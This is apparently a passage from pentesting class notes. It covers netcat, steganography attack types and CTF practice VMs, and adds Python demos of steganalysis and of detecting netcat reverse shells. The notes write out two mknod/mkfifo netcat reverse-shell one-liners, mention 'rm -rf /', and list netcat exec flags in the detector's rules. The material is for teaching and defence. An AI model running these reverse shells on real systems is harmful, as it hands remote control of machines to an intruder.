- The original GIF (sourced from https://www.youtube.com/watch?v=TIfAkOBMf5A)
- Don’t actually run rm -rf / on your box.
- If you want to find out what happens, google for the Unix Recovery Legend (a copy of it is hosted here: http://www.ee.ryerson.ca/~elf/hack/recovery.html)
- (these don’t seem to be for sale any longer. If you’re reading this after Rand Paul’s inevitable defeat in the Republican primaries, then they’re definitely not for sale)
- Netcat is a tool you will need to get very comfortable with as a pentester. Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports. It’s built into almost every Linux or Unix OS (including OS X) and versions are available for Windows and other OSes too.
- Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others.
- Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers. Or even pentesters on engagements, for that matter.
- Stego-only attack: you only have the medium with the hidden data in it
- Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
- Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
- Known-stego attack: you know the steg method used and you have access to the original and modified medium
- Chosen-stego attack: you have access to different steg tools and you try each of them and look for similarities to determine which method was used for the file you’re analysing
- Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures
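The known-cover and known-stego attacks above come down to one comparison: diff the original medium against the suspect copy and see which bits moved. This added example (not from the original notes) does that on a constructed byte array standing in for image pixels, with a toy sequential-LSB embedding used only to build the sample; the `analyse_known_cover` and `extract_lsb` helpers and the `flag{hi}` payload are assumptions for illustration, not any real steganography tool's output.

```python
import random


def embed_lsb(cover: bytes, message: bytes) -> bytes:
    """Sequential LSB embedding. Used only to construct the stego sample for
    the analysis below; a toy scheme, not any real steganography tool."""
    bits = [(byte >> (7 - i)) & 1 for byte in message for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("message does not fit in the cover")
    out = bytearray(cover)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit  # overwrite bit 0 only
    return bytes(out)


def changed_bit_planes(cover: bytes, stego: bytes) -> dict:
    """Known-cover attack: for each bit position 0..7, count how many samples
    changed between the original medium and the suspected stego copy."""
    if len(cover) != len(stego):
        raise ValueError("cover and stego must be the same length")
    counts = {bit: 0 for bit in range(8)}
    for a, b in zip(cover, stego):
        delta = a ^ b
        for bit in range(8):
            if (delta >> bit) & 1:
                counts[bit] += 1
    return counts


def changed_positions(cover: bytes, stego: bytes) -> list:
    """Indices of the samples that differ; shows where in the medium the
    embedding lives (sequential from the start, or spread throughout)."""
    return [i for i, (a, b) in enumerate(zip(cover, stego)) if a != b]


def analyse_known_cover(cover: bytes, stego: bytes) -> dict:
    """Summarise what the cover/stego pair reveals about the embedding."""
    counts = changed_bit_planes(cover, stego)
    positions = changed_positions(cover, stego)
    only_lsb = all(counts[bit] == 0 for bit in range(1, 8))
    # If only bit 0 changed and the changes sit at the start of the medium,
    # the last changed sample gives an upper bound on the payload length.
    max_payload_bytes = (positions[-1] // 8) + 1 if positions else 0
    return {
        "only_lsb": only_lsb,
        "changed_samples": len(positions),
        "first_changed": positions[0] if positions else None,
        "last_changed": positions[-1] if positions else None,
        "max_payload_bytes": max_payload_bytes,
    }


def extract_lsb(stego: bytes, nbytes: int) -> bytes:
    """Known-stego attack: once sequential LSB is identified (and, in the
    known-message case, the length is known), read the payload back out."""
    out = bytearray()
    for i in range(nbytes):
        value = 0
        for j in range(8):
            value = (value << 1) | (stego[i * 8 + j] & 1)
        out.append(value)
    return bytes(out)


# Constructed sample: 256 pseudo-random 8-bit "pixel" values stand in for an
# image, and a short constructed message is embedded in their LSBs.
_rng = random.Random(1)
COVER = bytes(_rng.randrange(256) for _ in range(256))
MESSAGE = b"flag{hi}"
STEGO = embed_lsb(COVER, MESSAGE)

if __name__ == "__main__":
    print(analyse_known_cover(COVER, STEGO))
    print(extract_lsb(STEGO, len(MESSAGE)))
```

Roughly half of the message bits will already match the cover's LSBs, so the diff shows fewer changed samples than payload bits; what gives the scheme away is that every change is in bit plane 0 and all of them fall inside the first 64 samples. Real tools spread or encrypt the payload, which is why the chosen-stego and chosen-message attacks (running candidate tools and comparing their footprints) exist.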
- The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.
- Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali. Check out README.Debian and README.gz. Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
- Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd. netcat-openbsd is the most common version you’ll find installed on Debian, Ubuntu, Red Hat, and various other Linux distributions. The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent attackers from leaving backdoors.
- Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
1.) mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
2.) mkfifo pipe && nc <remote server> <port> < pipe | /bin/bash &> pipe (this one is better, because it will also pipe stderr to you, so you can see error messages)
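From the defender's side, the two one-liners above have a recognisable shape in process telemetry: a named pipe is created, netcat is launched, and a shell interpreter is wired to it through redirections. This added example (not from the original notes) scans constructed command lines, such as an EDR or `ps -eo args` export might show, for that combination, as well as for the “-e” style flags the notes say netcat-openbsd removed. The `detect_netcat_shell` function, the indicator names and the sample lines are assumptions for illustration; the 203.0.113.5 address is a documentation-range placeholder.

```python
import shlex

# Binary names and flags this check looks for. The exec flags are the
# "-e"-style options the notes say netcat-openbsd removed; the fifo pattern is
# the mknod/mkfifo workaround shown in the two one-liners.
NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
PIPE_MAKERS = {"mkfifo", "mknod"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def _tokens(cmdline: str) -> list:
    """Split a command line the way a shell would; fall back to whitespace
    splitting if quoting is unbalanced (truncated log fields are common)."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def detect_netcat_shell(cmdline: str) -> dict:
    """Flag a process command line that looks like a netcat-spawned shell:
    netcat with an exec flag, or netcat plus a named pipe plus a shell
    interpreter (the fifo relay pattern from the one-liners above)."""
    tokens = _tokens(cmdline)
    names = {t.rsplit("/", 1)[-1] for t in tokens}  # strip directory parts
    indicators = []
    has_nc = bool(names & NETCAT_NAMES)
    if has_nc:
        indicators.append("netcat")
    if has_nc and (set(tokens) & EXEC_FLAGS):
        indicators.append("exec-flag")
    if names & PIPE_MAKERS:
        indicators.append("named-pipe")
    if names & SHELLS:
        indicators.append("shell")
    alert = "exec-flag" in indicators or (
        has_nc and "named-pipe" in indicators and "shell" in indicators
    )
    return {"cmdline": cmdline, "alert": alert, "indicators": indicators}


def scan(cmdlines) -> list:
    """Run the check over a batch of command lines."""
    return [detect_netcat_shell(line) for line in cmdlines]


# Constructed sample command lines. The first two mirror the one-liners in the
# notes; the rest are ordinary netcat and fifo usage that must not alert.
SAMPLE_CMDLINES = [
    "mknod backpipe p && nc 203.0.113.5 4444 0<backpipe | /bin/bash 1>backpipe",
    "mkfifo pipe && nc 203.0.113.5 4444 < pipe | /bin/bash &> pipe",
    "nc -l -p 8080 < index.html",                             # crude web server
    "nc -zv localhost 22",                                    # port check
    "mkfifo /tmp/logpipe && tail -f /tmp/logpipe | logger",  # fifo, no netcat
]

if __name__ == "__main__":
    for result in scan(SAMPLE_CMDLINES):
        flag = "ALERT " if result["alert"] else "ok    "
        print(flag, result["indicators"], result["cmdline"])
```

The check deliberately requires the whole triad (netcat, pipe creation, shell) before alerting, so a bare `mkfifo` or a netcat listener serving a file stays quiet; in a real pipeline the same logic would run over parent/child process chains rather than a single command string, since the pieces are often separate processes.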
This is the point in the class where I would start doing actual CTF challenges with the students. What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack. I had pretty small classes, so this was doable. I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.
But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself. Here are the first few I started them out on:
You can easily download the ISO images and run them in VMware or VirtualBox. I urge you to try to solve them on your own. The De-ICE ones do have a hint page in the target machine’s website. If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.